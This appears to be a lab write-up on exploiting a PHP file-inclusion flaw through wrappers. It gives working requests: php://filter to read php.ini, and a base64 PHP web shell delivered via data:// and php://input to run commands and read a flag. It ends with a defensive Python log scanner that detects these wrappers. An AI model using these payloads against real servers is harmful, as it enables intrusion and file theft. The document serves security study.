PHP Wrappers

April 21, 2024

curl "http://94.237.49.182:39505/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini" > php-ini.txt

Alternatively, we could just visit the URL in the browser.

Decode the output in the terminal. The decoded php.ini shows that allow_url_include is on, which means we can get RCE.

echo '<?php system($_GET["cmd"]); ?>' | base64

PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==

As we can see, we have RCE on the server.

  • First view, with curl:

curl -s 'http://94.237.49.182:39505/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id' | grep uid
  • Second view, in the browser:

http://94.237.49.182:39505/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=i

After that, we can list the files in the web server's current directory.

http://94.237.49.182:39505/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=ls

Then we can view the flag in the / directory.

http://94.237.49.182:39505/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=cd /; ls
http://94.237.49.182:39505/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=cat /37809e2f8952f06139011994726d9ef1.txt

For the second way to get RCE, we will try the input wrapper.

curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://94.237.49.182:39505/index.php?language=php://input&cmd=ls"

For the third way, we will try the expect wrapper.

echo 'BASE64 OF php.ini' | base64 -d | grep expect
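Each of the wrappers above shows up in the query string, so the requests are visible in the web server's access log even when the PHP code itself travels in a POST body. The following is an added example, not part of the original write-up: a small Python scanner that flags wrapper schemes in request parameters and decodes base64 data: payloads for the analyst. The log lines are constructed samples (including the client addresses and the benign `es.php` value), and all function names are this example's own.

```python
import base64
import re
from urllib.parse import urlsplit, unquote

# Wrapper schemes used in this write-up, matched at the start of a parameter value.
WRAPPER = re.compile(r"(php://filter|php://input|data:|expect://)", re.I)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
DATA_B64 = re.compile(r"data:(?://)?[^,]*;base64,(.*)", re.I | re.S)

SAMPLE_LOG = [  # constructed lines in Apache combined-log style
    '203.0.113.7 - - [21/Apr/2024:10:01:02 +0000] "GET /index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini HTTP/1.1" 200 95012',
    '203.0.113.7 - - [21/Apr/2024:10:03:40 +0000] "GET /index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id HTTP/1.1" 200 312',
    '203.0.113.7 - - [21/Apr/2024:10:05:11 +0000] "POST /index.php?language=php://input&cmd=ls HTTP/1.1" 200 540',
    '198.51.100.9 - - [21/Apr/2024:10:06:00 +0000] "GET /index.php?language=es.php HTTP/1.1" 200 2210',
]

def decode_data_payload(value):
    """Return the decoded body of a base64 data: URI, or None if there is none."""
    m = DATA_B64.match(value)
    if not m:
        return None
    b64 = m.group(1)
    try:
        raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    except ValueError:
        return None
    return raw.decode("utf-8", "replace")

def scan_line(line):
    """Return (param, wrapper, decoded_payload) for each suspicious parameter."""
    m = REQUEST.search(line)
    if not m:
        return []
    findings = []
    for pair in urlsplit(m.group(1)).query.split("&"):
        name, _, value = pair.partition("=")
        # unquote (not unquote_plus) keeps '+' intact for base64; the second
        # pass catches double-encoded values such as php%253A%252F%252Finput.
        value = unquote(unquote(value)).strip()
        hit = WRAPPER.match(value)
        if hit:
            findings.append((name, hit.group(1).lower(), decode_data_payload(value)))
    return findings

def scan(lines):
    """Scan many lines; returns (line_number, finding) pairs."""
    return [(n, f) for n, line in enumerate(lines, 1) for f in scan_line(line)]

if __name__ == "__main__":
    for lineno, (param, wrapper, payload) in scan(SAMPLE_LOG):
        print(f"line {lineno}: {param}= uses {wrapper}", f"payload={payload!r}" if payload else "")
```

A match on `data:` alone can also hit legitimate parameters that carry data URIs, so treat findings as leads to review rather than confirmed compromise.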
